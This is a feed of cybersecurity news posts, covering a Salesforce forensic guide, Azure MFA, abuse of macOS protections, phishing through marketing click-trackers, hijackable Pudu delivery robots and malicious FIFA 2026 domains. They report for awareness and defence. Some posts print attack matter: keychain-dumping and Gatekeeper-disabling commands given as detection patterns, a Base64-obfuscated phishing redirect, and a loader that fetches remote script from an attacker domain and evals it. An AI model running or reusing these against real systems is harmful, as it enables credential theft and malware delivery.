• Salesforce today unveiled its comprehensive Forensic Investigation Guide, equipping organizations with best practices, log analysis techniques, and automation workflows to detect and respond to sophisticated security breaches rapidly. 

    To reconstruct attack timelines and assess data exposure, the guide emphasizes three primary information sources: Activity Logs, User Permissions, and Backup Data. 

    Key Takeaways
    1. Salesforce’s new Forensic Investigation Guide outlines how to leverage Holistic log and backup use for incident reconstruction.
    2. Granular API event details to pinpoint data exfiltration.
    3. Real-time security policies for automated threat containment.

    Administrators should enable Shield Event Monitoring for real-time visibility into API calls, report exports, and file downloads. 

    The guide highlights three Event Monitoring sources:

    • Real Time Event Monitoring (RTEM) – streams threat detection alerts using statistical and machine learning methods to flag anomalies
    • Event Log Objects (ELO) – delivers low-latency records via Platform APIs for near real-time queries
    • Event Log Files (ELF) – provides comprehensive logs in CSV format for historic analysis
    WsW Explorer: Visualizing User Access
    WsW Explorer: Visualizing User Access

    By comparing ELF.ReportExport, ELO.ReportEventLog, and RTEM.ReportEventStream fields, investigators can pinpoint exactly which records and fields were accessed, with RTEM providing the most detailed context on queried entities and session parameters.

    Threats & Access dashboards
    Threats & Access dashboards

    Automated Response with Transaction Security Policies

    The guide also details how to leverage Enhanced Transaction Security Policies (TSP) to enact real-time countermeasures.

    Transaction Security Policies 

    Security teams can define policy rules to automatically block sensitive report downloads, trigger multi-factor authentication challenges, or create incident cases via workflow. For example, a Guest User Anomaly alert on a Digital Experience portal can activate a TSP that:

    • Blocks unauthorized AuraRequest events
    • Sends an immediate Slack notification
    • Requires MFA for any subsequent data access

    Such automation ensures that suspicious actions like abnormal API volumes or unexpected file exports are halted before data exfiltration can escalate.

    Organizations following the principle of least privilege across Profiles, Permission Sets, Sharing Rules, and Role Hierarchies will find forensic readiness significantly enhanced. 

    The guide recommends regular comparative analysis of backup snapshots using Backup & Recover, and continuous log streaming to centralized SIEM platforms for early anomaly detection.

    With the Salesforce Forensic Investigation Guide, enterprises are now armed to accelerate root-cause analysis, minimize downtime, and uphold data integrity in the face of evolving cloud-native threats.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Salesforce Releases Forensic Investigation Guide Following Chain of Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a significant security move, Microsoft announced on August 26, 2025, that it will require mandatory multifactor authentication (MFA) for all accounts signing in to the Azure portal and related administrative centers. The policy, first introduced in 2024, aims to dramatically reduce account compromise by enforcing an additional layer of identity verification across Azure and […]

    The post Microsoft Enforces MFA for Logging into Azure Portal appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • macOS has long been recognized for its robust, integrated security stack, but cybercriminals are finding ways to weaponize these very defenses.

     Recent incidents show attackers exploit Keychain, SIP, TCC, Gatekeeper, File Quarantine, XProtect, and XProtect Remediator to stealthily deliver malicious payloads. 

    Key Takeaways
    1. Abuse of macOS tools (Keychain, SIP, File Quarantine) for credential theft and evasion.
    2. Defense-evasion via disabling Gatekeeper, clickjacking TCC, and unloading XProtect.
    3. ESF logging with Sigma rules plus third-party EDR ensures detection.

    Exploiting Built-in macOS Protection

    Kaspersky reports that attackers have shifted from blunt-force exploits to nuanced abuse of legitimate tools and features. One common vector involves Keychain: adversaries use utilities like or the native /usr/bin/security list-keychains and security dump-keychain commands to harvest credentials.

    To detect such unauthorized usage, organizations must log process-creation events via ESF and flag invocations where cmdline matches security with -list-keychains or -dump-keychain. 

    A representative Sigma rule triggers on these patterns under attack.credential-access (T1555.001).

    System Integrity Protection (SIP) is another focus. Attackers boot into Recovery Mode to execute but they often probe SIP status first using csrutil status.

    Since Recovery Mode executions elude standard logs, defenders should implement continuous SIP status monitoring and generate alerts on state changes an approach aligned with Sigma rule T1518.001 under attack.discovery.

    Weaponizing File Quarantine, Gatekeeper, and TCC

    File Quarantine, which tags downloaded executables with the com.apple.quarantine attribute, can be bypassed by low-level tools such as curl or wget, or by invoking

     Leverage Built-in MacOS Protection Features

    Monitoring for xattr executions with -d com.apple.quarantine enables detection of quarantine-removal attempts (Sigma T1553.001 under attack.defense-evasion).

    Gatekeeper relies on code-signing and the spctl utility. Attackers may disable it or trick users into right-clicking an app to bypass signature checks, Kaspersky said.

    Alerting on spctl with –master-disable or –global-disable parameters uncovers these defense-evasion tactics (Sigma T1562.001).

    Transparency, Consent, and Control (TCC) governs access to the camera, microphone, and Full Disk Access through the SQLite-based TCC.db. 

    While modification requires disabling SIP or hijacking a system process, adversaries employ clickjacking overlays to trick users into granting elevated permissions. Continuous auditing of TCC.db changes and user prompts is crucial for early warning.

    Finally, XProtect and XProtect Remediator offer signature-based malware blocking and automatic remediation. 

    Sophisticated attackers attempt to disable or bypass these services by injecting unsigned kernel extensions (kexts) or abusing launchctl to unload Apple’s daemons. Defenders must track launchctl unload and unsigned-kext load attempts.

    Although macOS’s integrated security layers are formidable, attackers continuously evolve to exploit legitimate mechanisms. 

    Implementing detailed ESF-based logging, deploying Sigma rules for critical command patterns, and augmenting native defenses with third-party EDR solutions can effectively detect and thwart these advanced threats.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Hackers Leverage Built-in MacOS Protection Features to Deploy Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple appears poised to remove the physical SIM card slot from its upcoming iPhone 17 models in more countries, with a significant rollout anticipated across the European Union. This change would mark the latest step in Apple’s long-term strategy of transitioning to the more secure and flexible eSIM technology, a move already implemented in the […]

    The post Apple May Drop Physical SIM Card in iPhone 17 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity today is less about single attacks and more about chains of small weaknesses that connect into big risks. One overlooked update, one misused account, or one hidden tool in the wrong hands can be enough to open the door. The news this week shows how attackers are mixing methods—combining stolen access, unpatched software, and clever tricks to move from small entry points to large

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A high-severity vulnerability in SUSE’s Fleet, a GitOps management tool for Kubernetes clusters, has been disclosed by security researcher samjustus via GitHub Security Advisory GHSA-6h9x-9j5v-7w9h. The vulnerability, tracked as CVE-2024-52284, allows Helm chart values—often containing sensitive credentials—to be stored inside BundleDeployment resources in plain text, exposing them to any user with GET or LIST permissions. […]

    The post SUSE Fleet: Plain Text Storage of Vulnerability Exploit Helm Values appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical client-side remote code execution (RCE) vulnerability in Google Web Designer exposed Windows users to full system compromise, according to a detailed write-up by security researcher Balint Magyar. Affecting versions prior to 16.4.0.0711 (released July 29, 2025), the flaw allowed attackers to inject malicious CSS into a configuration file and leverage an internal API […]

    The post Google Web Designer Vulnerability Lets Hackers Take Over Client Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals are increasingly exploiting legitimate email marketing platforms to launch sophisticated phishing campaigns, leveraging the trusted reputation of these services to bypass security filters and deceive victims.

    This emerging threat vector represents a significant evolution in phishing tactics, where attackers abuse click-tracking domains and URL redirection services provided by established email marketing companies to mask their malicious intentions.

    The campaigns utilize platforms such as Klaviyo’s ‘klclick3.com’ and Drip Global’s ‘dripemail2.com’ domains, which are legitimate click-tracking services designed to monitor user interactions with marketing emails.

    By routing malicious URLs through these trusted domains, attackers create a veneer of legitimacy that helps their phishing emails evade detection by traditional security systems.

    The technique is particularly insidious because it exploits the inherent trust users place in recognized marketing platforms.

    Recent analysis reveals that these campaigns often employ sophisticated lures, including fake voicemail notifications, DocuSign document requests, and payment-related messages.

    Phishing email sample that uses voicemail as a lure (Source – Trustwave)

    The attackers demonstrate remarkable adaptability, combining traditional phishing techniques with modern evasion methods including CAPTCHA verification, compromised domains, and abuse of cloud services like Amazon Web Services and Cloudflare.

    Trustwave researchers identified a significant increase in phishing URLs containing familiar patterns and similar phishing templates, noting the resurgence in abuse of email marketing platforms alongside widespread use of URL redirectors.

    Their PageML system, which combines machine learning components with URL intelligence frameworks, has been instrumental in detecting these evolving threats in real-time.

    Advanced Redirection and Evasion Techniques

    The technical sophistication of these campaigns is evident in their multi-layered redirection mechanisms.

    In one documented case, attackers used a Base64-encoded redirection scheme where the initial phishing URL contained encoded strings that, when decoded, revealed the actual malicious destination.

    Phishing email sample that also contains a fake remittance image (Source – Trustwave)

    The source code analysis showed:-

    ucis.RedirectUrl = "aHR0cHM6Ly9vZmZpY21hc2RpbmRvbW1qZW9haWV1bnQuZXN6a3FlaHJoeXpkdXF2d3JiZ3h1dWd4YXF1bXJtLmlwLWRkbnMuY29tL2YvNFNTd08yUU5LQ3B5MWdDeEtzX0w=";
    ucis.RedirectUrl = atob(ucis.RedirectUrl); // decode to real URL

    Additionally, attackers implement anti-analysis measures by disabling right-click functionality through JavaScript event listeners:-

    addEventListener("contextmenu", function(e) {
        e.preventDefault();
    });

    The campaigns also employ chameleon phishing techniques, dynamically fetching company information and logos using services like Clearbit to create personalized phishing pages that appear legitimate to specific victims.

    These pages often integrate Cloudflare Turnstile for human verification, adding another layer of evasion while appearing to provide security measures.

    Human verification CAPTCHA (Source – Trustwave)

    The abuse of legitimate infrastructure creates significant challenges for cybersecurity teams, as traditional blacklisting approaches become ineffective when malicious content is hosted on trusted domains.

    This trend underscores the need for advanced behavioral analysis and machine learning-based detection systems capable of identifying malicious intent regardless of the hosting infrastructure’s reputation.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Abuse Legitimate Email Marketing Platforms to Disguise Malicious Links appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • You may have seen them in restaurants, cat-faced robots gliding between tables, delivering plates of food. These robots, many of them made by Pudu Robotics, the world’s largest commercial service robotics company, are part of a growing fleet of automated helpers in our daily lives.

    From the well-known BellaBot to cleaning and disinfection robots, Pudu’s machines operate in restaurants, hospitals, hotels, and offices worldwide, serving millions of people. But a recent discovery revealed a startling vulnerability: these robots could be controlled by anyone with a little technical know-how.

    Cybersecurity researcher “BobDaHacker” discovered that Pudu’s robot management APIs had a critical flaw: they lacked proper authentication checks.

    While a valid authentication token was required, the system failed to verify if the user had the necessary permissions to control the robots. This oversight meant that virtually any Pudu robot, whether a BellaBot in a restaurant or a FlashBot in a corporate office, was exposed.

    The vulnerabilities allowed unauthorized users to:

    • View the call history of any robot.
    • Create new tasks and control robots that they did not own.
    • Update robot settings, including their names and behaviors.
    • List all robots associated with any store globally.

    The potential for misuse was vast and alarming. In a restaurant setting, a hacker could reroute a BellaBot to deliver food to their own table instead of the correct one, cancel all robot tasks during a busy dinner service, or create chaos by having robots circle the dining room playing music.

    robots settings
    robots settings

    The implications extended far beyond restaurants. Pudu’s FlashBot, equipped with arms and the ability to use elevators, could be remotely controlled to access confidential documents in an office, navigate to a different floor, and deliver them to an unauthorized individual.

    In a more disruptive scenario, an attacker could hold an entire fleet of robots hostage, demanding a ransom to restore normal operations. The attacker could even display a QR code for payment on the robots’ screens.

    The risks were particularly concerning in healthcare environments. Pudu robots are used in hospitals for delivering medicine and for cleaning and disinfection.

    A malicious actor could redirect medicine deliveries, send cleaning robots into sterile operating rooms, or program disinfection robots to skip critical areas, posing a direct threat to patient safety.

    After discovering these flaws, the researcher attempted to report them to Pudu Robotics on August 12. Emails to the company’s sales, support, and tech teams went unanswered.

    A follow-up email to over 50 staff members on August 21 also received no reply. For weeks, the vulnerabilities remained unaddressed while the robots continued to operate in sensitive environments.

    Frustrated by the lack of response, the researcher took what they termed the “nuclear option.” They contacted some of Pudu’s largest customers, including Skylark Holdings, which operates over 7,000 restaurants in Japan, and Zensho, another major restaurant chain operator. The researcher explained that anyone could control the robots in their facilities.

    Within 48 hours of these customers being notified, Pudu Robotics responded, seemingly generated by an AI, thanking the researcher for their “responsible disclosure” and stating that their security team had “promptly investigated the issue.”

    The response even included a placeholder for the sender’s email address, suggesting a hasty and templated reply. Two days later, all the reported vulnerabilities were fixed.

    As these robots become more integrated into our lives, operating around vulnerable populations in hospitals, schools, and a variety of public spaces, ensuring their security is not just a technical necessity but a fundamental responsibility.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Food Delivery Robots can be Hacked to Deliver Meals to Your Table Instead of the Intended Customers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have observed an unprecedented surge in domain registrations in recent months, closely tied to the upcoming 2026 FIFA World Cup tournament.

    These domains, often masquerading as legitimate ticketing portals, merchandise outlets, or live-stream platforms, serve as precursors to a multifaceted cyber campaign designed to harvest credentials, distribute malware, and siphon financial data.

    Attackers are leveraging the high-profile nature of the event, registering deceptive domains up to eighteen months in advance to avoid detection and establish credibility among unsuspecting fans.

    Fake website using a variety of logos and the native language of one of the host countries to promote the sale of FIFA WC26 tickets (Source – BeforeAI)

    As interest in match schedules and ticket availability peaks, visitors are lured into interacting with these fraudulent websites, unknowingly initiating the infection chain.

    BeforeAI analysts identified a cluster of over 498 suspicious domains containing terms such as “fifa,” “worldcup,” and host city names, with registrations peaking in August 2025.

    Registrar distribution of suspicious domains (Source – BeforeAI)

    These domains are distributed across top registrars including GoDaddy.com and Namecheap, as well as low-friction TLDs like .online and .shop.

    In many cases, threat actors repurpose aged domains previously registered for other sporting events, further complicating attribution and takedown efforts.

    The registration of domains anchored to future tournaments in 2030 and 2034 highlights the long-term strategy employed by these cybercriminal groups.

    The impact of this preparatory activity extends beyond simple phishing attempts. Victims who input personal details on these sites may be redirected to payload delivery servers hosting trojan droppers capable of evading signature-based detection.

    Mandarin-based websites promoting multiple threats for a page titled as FIFA World Cup Schedule (Source – BeforeAI)

    Initial reconnaissance indicates that the malware leverages polymorphic loaders to modify its decryption routines on each execution, thwarting static analysis.

    Command-and-control (C2) communications occur over HTTPS to blend with legitimate traffic, while fallback DNS tunnels allow for data exfiltration even if primary channels are disrupted.

    Infection Mechanism and Persistence Tactics

    Delving deeper into the infection mechanism reveals a staged process beginning with a malicious JavaScript injected into compromised landing pages.

    When unsuspecting users visit URLs like watchfootball-live.com, the script checks the browser environment and delivers a second-stage payload only if specific conditions are met, such as running outdated browser plugins. This selective delivery reduces exposure to sandbox analysis.

    The following snippet demonstrates how the script computes a time-based hash to retrieve the payload URL:-

    (function() {
        const key = "WorldCup2026";
        const now = Math.floor(Date.now() / 3600000);
        const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
        fetch(`https://${hash}.cdn-delivery.net/payload.js`)
            .then(response => response. Text())
            .then(eval);
    })();

    Once executed, the payload writes a small loader to the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence.

    It then downloads additional modules disguised as harmless image files, which are in fact encrypted executables unpacked in memory and injected into legitimate processes such as svchost.exe.

    By employing reflective DLL injection, the malware avoids dropping components to disk, significantly reducing forensic footprints.

    The sophisticated use of aged domains, combined with polymorphic and in-memory techniques, underscores the evolving threat landscape as the world gears up for the 2026 FIFA World Cup.

    Continuous monitoring and proactive domain blacklisting will be crucial to safeguard fans and organizations from this looming cyberattack.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Registering Domains to Launch Cyberattack Targeting 2026 FIFA World Cup Tournament appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶